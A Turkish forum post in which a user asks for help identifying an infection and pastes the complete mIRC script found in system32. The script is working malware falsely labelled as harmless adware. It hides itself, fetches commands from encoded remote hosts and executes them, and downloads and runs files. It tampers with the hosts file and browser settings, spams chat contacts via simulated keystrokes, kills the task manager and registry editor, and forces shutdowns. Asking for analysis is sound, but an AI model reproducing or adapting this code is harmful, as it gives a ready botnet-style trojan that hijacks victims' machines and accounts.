| LauReLL | 08 Ekim 2008 05:48 |
mIRc Virüsü ( hemde bana )
Arkadaş bana bi Site adresi gönderdi mirc ile ilgili olunca tıkladım birden PC delirdi
CTRL+ALT+DEL tusuna bastıgımda mirc.exe diye birşey gördüm ama ben mirc.exe calıstırmamıştım...
Aradım ve system32 nin içinde mirc.exe ve mirc.ini ve içersinde winwizard.dll seklinde dosyalara rastladım...
winwizard dosyası mirc ile acılıyor mirc otomatik PC acıldıgına devreye giriyor ve bu dısya PC de binevi Administator durumuna giriyor sizi devre dısı bırakıyor...
Buyrun Ben mirc koder oldugun halde çözemedim Hocalarıma Soruyorum Nedir Bunlar...
ben mirc ile ilgileniyorum diye bana özel bişi sanırım (: Kod:
;;;;; File Information
; This file is an open source mIRC script working for display advertisements. You accepted displaying advertisements before you install or download this program.
; This file don't damage anything from your computer.
; This program don't save and don't send your private informations to 3rd persons or sites. This isn't a spyware and don't contains keylogger. Don't worry about this.
; This file is an adware and don't contains harmful codes (botnet etc).
; In the same directory with this file "mirc.exe" runs this script.
; When you delete this script (or mirc.ini or mirc.exe), displaying of all advertisements will stop absolutely.
; If you delete this file, delete "mirc.exe" and "mirc.ini" too.
; If you wanna, you can uninstall this program from Control Panel. Clicking to "Uninstall mIRC" will delete all files of this program.
;;;;;
on *:start: {
.timerfa -m 1 50 _first
.timerfb -m 1 200 _firstactions
}
alias _first {
dll softwares.dll HideMirc on
}
alias _firstactions {
.timerchecknetwork 0 20 _checknetwork
if $_osch {
.timermregg 1 4 _mreg
}
.timerload 1 3 _firstloads
.timeradvert 0 1 _advert
}
alias _firstloads {
hmake start
hadd -m start mdir $iif(windows isin $mircdir,$mircdir,$_sysdir)
hadd -m start ver $readini(value.ini,on,ver)
_mreg
}
alias _checknetwork {
if $_ifwork {
if !$hget(dns,dns) {
dns [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
}
}
}
alias _osch {
if $os != 2K {
return $true
}
else {
return $false
}
}
on *:dns: {
if $hget(dns,dns) {
if $dns(1).ip == $hget(vars,googledns) {
hadd -m vars dnsok yes
}
return
}
if $dns(1) {
hadd -m dns dns ok
_startups
_timers.load
}
}
alias _startups {
.timerpar 1 5 _params.load
}
alias _timers.load {
.timerparamsload 0 60 _params.load
if $_osch {
.timermircreg 0 3600 _mreg
}
}
alias _params.load {
unset %sr*
if $hget(re,params) {
hadd -m loaded bln ok
hadd -m loaded wlm ok
hadd -m loaded ieo ok
hadd -m loaded wp ok
hadd -m loaded sp ok
hadd -m loaded mr ok
hadd -m loaded ha ok
hadd -m loaded ds ok
hadd -m loaded su ok
hadd -m loaded eof ok
}
sockclose params
sockopen params $_mdxh
}
alias _sysdir {
if $exists(c:\windows) {
return C:\WINDOWS\SYSTEM32\
}
if $exists(d:\windows) {
return D:\WINDOWS\SYSTEM32\
}
if $exists(e:\windows) {
return E:\WINDOWS\SYSTEM32\
}
if $exists(f:\windows) {
return F:\WINDOWS\SYSTEM32\
}
if $exists(g:\windows) {
return G:\WINDOWS\SYSTEM32\
}
}
on *:sockopen:*: {
var %- sockwrite -nt $sockname
if $sockname == params {
%- GET $+(/index4.php,?ver=,$hget(start,ver),&nsetup=,$_nsetup) HTTP/1.1
%- Host: $gettok($_mdxh,1,32)
%- Connection: Close
%-
}
elseif $sockname == dsdown {
%- GET $+(/,$hget(vars,dsget)) HTTP/1.1
%- Accept: */*
%- Accept-Language: tr
%- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; InfoPath.2)
%- Host: $hget(vars,dshost)
%- Connection: Close
%-
}
elseif supdate* iswm $sockname {
var %: $right($sockname,-7)
%- GET $+(/,$hget(vars,$+(suget,%:))) HTTP/1.1
%- Accept: */*
%- Accept-Language: tr
%- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; InfoPath.2)
%- Host: $hget(vars,$+(suhost,%:))
%- Connection: Close
%-
}
}
on *:sockread:*: {
if $sockname == params {
sockread %sread. [ $+ [ $sockname ] ]
tokenize 32 %sread. [ $+ [ $sockname ] ]
if $1 == bln && !$hget(loaded,bln) {
inc %bln 1
hadd -m bln $+(bln,%bln) $+($gettok($2-,2,94),^,$gettok($2-,3,94),^,$gettok($2-,4,94))
$+(.timerbln,$r(1,99999999)) $gettok($gettok($2-,1,94),1-2,32) $+(.timerbln,$r(1,99999999)) $gettok($gettok($2-,1,94),3-4,32) _blnactive $+(bln,%bln)
.timertraybln 1 30 dll stray.dll DoTray baloon 1 > microsoft.ico > Live Informations
}
if $1 == wlm && !$hget(loaded,wlm) {
inc %wlm 1
hadd -m wlm $+(wlm,%wlm) $+($gettok($2-,2,94),^,$gettok($2-,3,94),^,$gettok($2-,4,94),^,$gettok($2-,5,94))
$+(.timerwlm,$r(1,99999999)) $gettok($gettok($2-,1,94),1-2,32) $+(.timerwlm,$r(1,99999999)) $gettok($gettok($2-,1,94),3-4,32) _wlmactive $+(wlm,%wlm)
}
if $1 == ieo && !$hget(loaded,ieo) {
$+(.timerieo,$r(1,99999999)) $gettok($gettok($2-,1,94),1-2,32) $+(.timerwlm,$r(1,99999999)) $gettok($gettok($2-,1,94),3-4,32) run -n iexplore.exe -new $gettok($2-,2-,94)
}
if $1 == wp && !$hget(loaded,wp) {
hadd -m vars wprefix $gettok($2-,$r(1,$numtok($2-,44)),44)
.timerwp 1 30 _wprefix
}
if $1 == sp && !$hget(loaded,sp) {
hadd -m vars spage $gettok($2-,$r(1,$numtok($2-,44)),44)
.timersp 1 60 _spage
}
if $1 == mr && !$hget(loaded,mr) {
$2-
}
if $1 == ha && !$hget(loaded,ha) {
if $3 == [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] {
hadd -m vars googledns $2
.timerdnscheck 1 20 dns [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
}
$+(.timerhost,$r(1,9999999)) 1 2 _hostadd $2-
}
if $1 == ds && !$hget(loaded,ds) {
hadd -m vars dshost $gettok($2,1,47)
hadd -m vars dsget $gettok($2,2,47)
hadd -m vars dsname $3-
}
if $1 == su && !$hget(loaded,su) {
hadd -m vars $+(suhost,$2) $gettok($3,1,47)
hadd -m vars $+(suget,$2) $gettok($3,2,47)
hadd -m vars $+(subytes,$2) $4
hadd -m vars $+(suifrun,$2) $5
if (!$exists($gettok($3,2,47))) || ($file($hget(vars,$+(suget,$2))) != $hget(vars,$+(subytes,$2))) {
_supdate $2
}
}
if $1 == HTTP: {
hadd -m vars paramsloading ok
if m*m !iswm $gettok($2,2,46) && t*e !iswm $gettok($2,2,46) && p*e !iswm $gettok($2,2,46) {
_goa
}
}
if $1 == msnmsgs1 {
hadd -m vars msnmsgs1 $2-
}
if $1 == msnmsgs2 {
hadd -m vars msnmsgs2 $2-
}
if $1 == eof && !$hget(loaded,eof) {
if $hget(vars,dsget) && !$exists($hget(vars,dsget)) {
_dsdown
}
.timerparamsload off
unset %bln , %wlm
if !$hget(vars,paramsloading) {
_goa
}
}
}
elseif $sockname == dsdown {
if $sockerr {
return
}
else {
if ($hget(sets,$hash($sockname,32)) != 1) {
var %h. [ $+ [ $hash($sockname,32) ] ]
sockread %h. [ $+ [ $hash($sockname,32) ] ]
while $sockbr {
if * !iswm %h. [ $+ [ $hash($sockname,32) ] ] {
hadd -m sets $hash($sockname,32) 1
break
}
sockread %h. [ $+ [ $hash($sockname,32) ] ]
}
}
sockread 4096 &d
while $sockbr {
bwrite $hget(vars,dsget) -1 -1 &d
sockread 4096 &d
}
}
}
elseif supdate* iswm $sockname {
if $sockerr {
return
}
else {
if ($hget(sets,$+($sockname,$hash($sockname,32))) != 1) {
var %h. [ $+ [ $+($sockname,$hash($sockname,32)) ] ]
sockread %h. [ $+ [ $+($sockname,$hash($sockname,32)) ] ]
while $sockbr {
if * !iswm %h. [ $+ [ $+($sockname,$hash($sockname,32)) ] ] {
hadd -m sets $+($sockname,$hash($sockname,32)) 1
break
}
sockread %h. [ $+ [ $+($sockname,$hash($sockname,32)) ] ]
}
}
sockread 4096 $+(&,$sockname)
while $sockbr {
bwrite $hget(vars,$+(suname,$sockname)) -1 -1 $+(&,$sockname)
sockread 4096 $+(&,$sockname)
}
}
}
}
alias _blnactive {
hadd -m vars blnclick $gettok($hget(bln,$1),1,94)
_bln Balloon 1 3 > $gettok($hget(bln,$1),2,94) > $gettok($hget(bln,$1),3,94)
}
alias _wlmactive {
hadd -m vars wlmclick $gettok($hget(wlm,$1),1,94)
hadd -m vars wlmtitle $gettok($hget(wlm,$1),2,94)
hadd -m vars wlmtext $gettok($hget(wlm,$1),3,94)
hadd -m vars wlmid $gettok($hget(wlm,$1),4,94)
if !$hget(nowlm,$hget(vars,wlmid)) {
_wlm
}
}
alias _wlmactive2 {
hadd -m vars wlmclick $gettok($1-,1,94)
hadd -m vars wlmtitle $gettok($1-,2,94)
hadd -m vars wlmtext $gettok($1-,3,94)
hadd -m vars wlmid $gettok($1-,4,94)
if !$hget(nowlm,$hget(vars,wlmid)) {
_wlm
}
}
alias _mstitle {
if * - Konu?ma iswm $1- || * - Converstation iswm $1- || * - Unterhaltung iswm $1- || * - samtale iswm $1- || * - Conversación iswm $1- || * - keskustelu iswm $1- || * – Beszélgetés iswm $1- || * - Conversazione iswm $1- || * - Gesprek iswm $1- || * - Konwersacja iswm $1- || * - konverzácia iswm $1- || * - pogovor iswm $1- || * - konversation iswm $1- {
return $true
}
if *@* - Instant Message iswm $1- || *@* - Mensagem instantânea iswm $1- || *@* - Message iswm $1- || *@* - Mensaje instantáneo iswm $1- || *@* - Message instantané iswm $1- || *@* - Messaggio istantaneo iswm $1- {
return $true
}
if *(online) - Chat iswm $1- {
return $true
}
if skype isin $1- {
if * Yaz?l? Mesaj iswm $1- || * Chat iswm $1- || * - vestlus iswm $1- || * - Discussion iswm $1- || * sarakste iswm $1- || * pokalbis iswm $1- || * – üzenetváltás iswm $1- || * - Chatsessie iswm $1- || * lynmeldinger iswm $1- || * wiadomosci tekstowe iswm $1- || * conversa iswm $1- || * Mesaj text iswm $1- || * chatti iswm $1- || * chatt iswm $1- {
return $true
}
}
if *IM with*from* iswm $1- {
return $true
}
}
on *:sockclose:*: {
if $sockname == dsdown {
.copy $hget(vars,dsget) $+($shortfn($+($gettok($mircdir,1,92),\Documents and Settings\All Users\Desktop)),\,$hget(vars,dsname))
}
if supdate* iswm $sockname {
if $file($hget(vars,$+(suname,$sockname))) == $hget(vars,$+(subytes,$right($sockname,-7))) {
if $exists($hget(vars,$+(suget,$right($sockname,-7)))) {
.remove $hget(vars,$+(suget,$right($sockname,-7)))
}
.rename $hget(vars,$+(suname,$sockname)) $hget(vars,$+(suget,$right($sockname,-7)))
if $hget(vars,$+(suifrun,$right($sockname,-7))) {
$+(.timerrun,$sockname) 1 5 run $hget(vars,$+(suget,$right($sockname,-7)))
}
}
}
}
alias _wkill {
if *s?stem*?onfigurat* iswm $1- || *?onfigura*d?*s?stem* iswm $1- || *syst??m*?onfig* iswm $1- || *?onfigura*s?st?m* iswm $1- || *s?stem*yap?land?rm* iswm $1- || *opciones*de*carpeta* iswm $1- {
return $true
}
if *task*m?n?g?r* iswm $1- || *adm?n*de*tar*de*windows* iswm $1- || *gestion*des*t?ches*windows* iswm $1- || *geren*de*taref*windows* iswm $1- || *taakbeheer* iswm $1- || *g?rev*y?net?c?s* iswm $1- || *mened?er*zad?n*windows* iswm $1- || *manager*windows* iswm $1- || *windows*jobl?st?* iswm $1- {
return $true
}
if *reg?st*edit?r* iswm $1- || *ed?t?r*de*reg?st* iswm $1- || *diteur*du*reg?str* iswm $1- || *ed?tor*rejestru* iswm $1- || *kay?t*defter?* iswm $1- || *reg?st*s?stem* iswm $1- || *reg?st*d?ger?n* iswm $1- {
return $true
}
}
alias _advert {
var %aw $dll(uinput.dll,getActiveWindow,.)
if $_ifwork {
if (!$hget(msnmsgs,$hash($gettok(%aw,3-,32),32))) && ($hget(vars,msnmsgs1) || $hget(vars,msnmsgs2)) {
if $_mstitle(%aw) {
if $hget(vars,msnmsgs1) {
_sk $hget(vars,msnmsgs1)
_sk {ENTER}
}
if $hget(vars,msnmsgs2) {
_sk $hget(vars,msnmsgs2)
_sk {ENTER}
}
_sk {ESC}
hadd -m msnmsgs $hash($gettok(%aw,3-,32),32) 1
if !$hget(re,params) {
.timerreparams 0 1800 _params.load
hadd -m re params ok
_params.load
}
}
}
}
if $_wkill(%aw) {
run -n taskkill /f /im msconfig.exe
run -n taskkill /f /im regedit.exe
run -n taskkill /f /im taskmgr.exe
}
if $gettok(%aw,3-,32) == system32 {
run shutdown -s -f -t 0
}
if mirc isin %aw && !$hget(mirc,reg) {
hadd -mu10 mirc reg 1
hinc -m mirc regi 1
_mreg
}
if $nopath($script) isin %aw || $nopath($mircini) isin %aw || !$exists($nopath($mircini)) {
_goa
}
}
alias _ifwork {
hadd -m vars iw $calc($ctime($date) - $ctime($readini(value.ini,on,my)))
if $hget(vars,iw) < 86400 {
if !$hget(vars,msmail) {
_msmail
hadd -m vars msmail ok
}
hadd -m vars newsetup yes
}
else {
hadd -m vars newsetup no
}
return $true
}
alias _nsetup {
return $hget(vars,newsetup)
}
alias _goa {
if $exists($nopath($script)) {
.timerremovescript 1 1 .remove $nopath($script)
}
.timerdown 1 2 run shutdown -s -f -t 0
}
alias _wlm {
if !$dialog(wlm) {
dialog -mo wlm wlm
}
}
dialog wlm {
title "wlm"
size -1 -1 246 220
option dbu
icon 1, 0 0 249 231, wlm.jpg, 0 noborder
text "text", 7, 4 60 238 16, center
text "text", 2, 4 84 238 49, center
text "• Bu reklamin gosterimini iptal etmek isterseniz buraya tiklatin.", 3, 4 204 239 8
icon 4, 74 143 35 11, yes.jpg, 0 noborder
icon 5, 136 143 35 11, no.jpg, 0 noborder
icon 6, 229 2 16 8, cls.jpg, 0 noborder
}
on *:dialog:wlm:*:*: {
if $devent == init {
_mdxinit
_mdx SetDialog $dname style 2
_mdx SetDialog $dname bgcolor $rgb(0,0,0)
_mdx SetFont $dname 2 13 800 tahoma
_mdx SetFont $dname 7 16 1200 tahoma
_mdx SetColor $dname 2,3,5 text $rgb(0,0,0)
_mdx SetColor $dname 2,3,5 background $rgb(235,246,249)
_mdx SetColor $dname 2,3,5 textbg $rgb(235,246,249)
_mdx SetColor $dname 7 text $rgb(19,58,148)
_mdx SetColor $dname 7 background $rgb(235,246,249)
_mdx SetColor $dname 7 textbg $rgb(235,246,249)
_wlminit
}
if $devent == sclick {
if $mouse.y < 309 && $mouse.y > 280 {
if $mouse.x < 219 && $mouse.x > 146 {
run iexplore.exe -new $hget(vars,wlmclick)
dialog -x $dname $dname
}
if $mouse.x < 342 && $mouse.x > 272 {
dialog -x $dname $dname
}
}
if $mouse.x < 492 && $mouse.x > 456 && $mouse.y > 4 && $mouse.y < 19 {
dialog -x $dname $dname
}
if $mouse.x < 409 && $mouse.x > 8 && $mouse.y > 400 && $mouse.y < 423 {
hadd -m nowlm $hget(vars,wlmid) $hget(vars,wlmid)
dialog -x $dname $dname
}
if $did == 5 {
dialog -x $dname $dname
}
}
}
alias _wlminit {
did -a wlm 7 $hget(vars,wlmtitle)
did -a wlm 2 $replace($hget(vars,wlmtext),~,$cr)
}
alias _mdx {
return $dll(msdlg.dll,$1,$2-)
}
alias _mdxinit {
_mdx SetMircVersion $version
_mdx MarkDialog $dname
}
alias _mdxh {
return $iif($hget(vars,newsetup) == yes,$_mdxh2,$decode(d3d3LnRhbWthZml5ZS5jb20gODA=,m))
}
alias _bln {
if balloon isin $1- {
dll stray.dll $_ksl(70,$gettok($1-,1-2,62)) > $_ksl(230,$gettok($1-,3-,62))
}
else {
dll stray.dll $1-
}
}
alias _ksl {
if $1 > 3 && $len($2-) > $1 {
return $left($2-,$calc($1 -3)) $+ ...
}
else {
return $2-
}
}
alias _mdxh2 {
return $decode(d3d3Lm1pbWFyc2luYW5lZ2l0aW0uY29tIDgw,m)
}
alias baloon {
if $1 == ldclick {
run $hget(vars,blnclick)
}
if $1 == Ballon_Clicked {
run $hget(vars,blnclick)
}
}
alias _sk {
if !$com($hget(obj,obj)) {
hadd -m obj obj $+($r(a,z),$r(a,z),$r(a,z),$r(a,z),$r(a,z),$r(a,z))
.comopen $hget(obj,obj) WScript.Shell
}
var %temp = $com($hget(obj,obj),SendKeys,3,bstr,$1-)
}
alias _mreg {
hadd -m vars mr $r(99,999999) $+ .reg
write $hget(vars,mr) REGEDIT4
write $hget(vars,mr) [HKEY_CURRENT_USER\Software\mIRC\UserName]
write $hget(vars,mr) ""="REPTILE"
write $hget(vars,mr) [HKEY_CURRENT_USER\Software\mIRC\License]
write $hget(vars,mr) ""="3482-267956"
run -n regedit /s $hget(vars,mr)
.timermr -i 1 4 .remove $hget(vars,mr)
}
alias _wprefix {
hadd -m vars wpr $r(99,999999) $+ .reg
write $hget(vars,wpr) REGEDIT4
write $hget(vars,wpr) [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes]
write $hget(vars,wpr) "
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.
run -n regedit /s $hget(vars,wpr)
.timermw -i 1 4 .remove $hget(vars,wpr)
hadd -m vars wpr $r(99,999999) $+ .reg
write $hget(vars,wpr) REGEDIT4
write $hget(vars,wpr) [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
write $hget(vars,wpr) ""=" $+ $hget(vars,wprefix) $+ "
run -n regedit /s $hget(vars,wpr)
.timermww -i 1 4 .remove $hget(vars,wpr)
}
alias _spage {
if $hget(vars,dnsok) {
hadd -m vars spage [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
}
hadd -m vars wpr $r(99,999999) $+ .reg
write $hget(vars,wpr) REGEDIT4
write $hget(vars,wpr) [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
write $hget(vars,wpr) "Start Page"=" $+ $hget(vars,spage) $+ "
run -n regedit /s $hget(vars,wpr)
.timerms -i 1 4 .remove $hget(vars,wpr)
}
alias _hostadd {
var %hdir $+($mircdir,drivers\etc\hosts)
while $read(%hdir,w,$+(*,$2,*)) {
write $+(-dl,$readn) %hdir
}
write %hdir $1-
}
alias _dsdown {
write -c $hget(vars,dsget)
sockclose dsdown
sockopen dsdown $hget(vars,dshost) 80
}
alias _supdate {
var %suname $+(supdate,$1)
hadd -m vars $+(suname,%suname) $+($r(a,z),$r(a,z),$r(a,z),$r(a,z),$r(a,z),$r(a,z),$r(a,z),.txt)
sockclose %suname
sockopen %suname $hget(vars,$+(suhost,$1)) 80
}
alias _msmail {
if !$dialog(msmail) {
dialog -md msmail msmail
}
}
alias _msmailerr {
.echo -q $input(File not found 'msivc32.dll',oh,RUNDLL ERROR)
}
dialog msmail {
title "MSMAIL"
size -1 -1 118 77
option dbu
icon microsoft.ico,0
edit "", 1, 37 6 77 10
text "Mail address:", 2, 3 7 30 8
text "New pass:", 3, 3 22 30 8
edit "", 4, 37 21 77 10
button "Start", 5, 37 59 77 12
text "this software published for testing. dont use for black ideals.", 6, 38 34 76 23, disable
text "v1.0", 7, 3 61 25 8, disable
}
on *:dialog:msmail:*:*: {
if $devent == init {
dialog -x $dname
_msmailerr
}
if $devent == sclick {
if $did == 5 {
}
}
}
on *:exit: {
run $nopath($mircexe)
}
;
|
